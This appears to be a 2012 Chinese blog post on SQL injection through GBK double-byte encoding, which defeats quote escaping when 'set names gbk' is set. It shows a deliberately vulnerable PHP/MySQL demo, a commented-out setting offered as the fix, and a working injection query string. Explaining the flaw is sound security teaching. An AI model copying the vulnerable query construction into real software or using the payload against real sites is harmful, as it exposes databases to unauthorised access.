利用GBK双字节编码突破PHP单引号转义限制进行SQL注入:set names gbk导致的sql注入

<?php
$conn = mysql_connect('localhost','root','')or die("<font color=red>不能连接数据库!</font>");
$db = mysql_select_db('test',$conn);
mysql_query("set names 'gbk'");//如果是这行,就可以注入了
//mysql_query("SET character_set_connection='gbk',character_set_results='gbk',character_set_client=binary");//换成这行,就可以防止注入了
$username = $_GET['username'];
$query = "select * from zp where class_id='27' and flag=0 and username='$username' order by id desc limit 1";
echo $query;
$result = mysql_query($query);
$row = mysql_fetch_array($result);
print_r($row);
?>


get变量:?username=test%d5%27%20or%20id=1%23 

------------------------------

参考来源:http://hi.baidu.com/cdcxdzj/blog/item/43a514f7017711c3f3d38515.html

http://hi.baidu.com/wbkys/item/b908c20b8014ec1ceafe380a

posted @ 2012-08-28 17:40  y0umer  阅读(275)  评论(0编辑  收藏  举报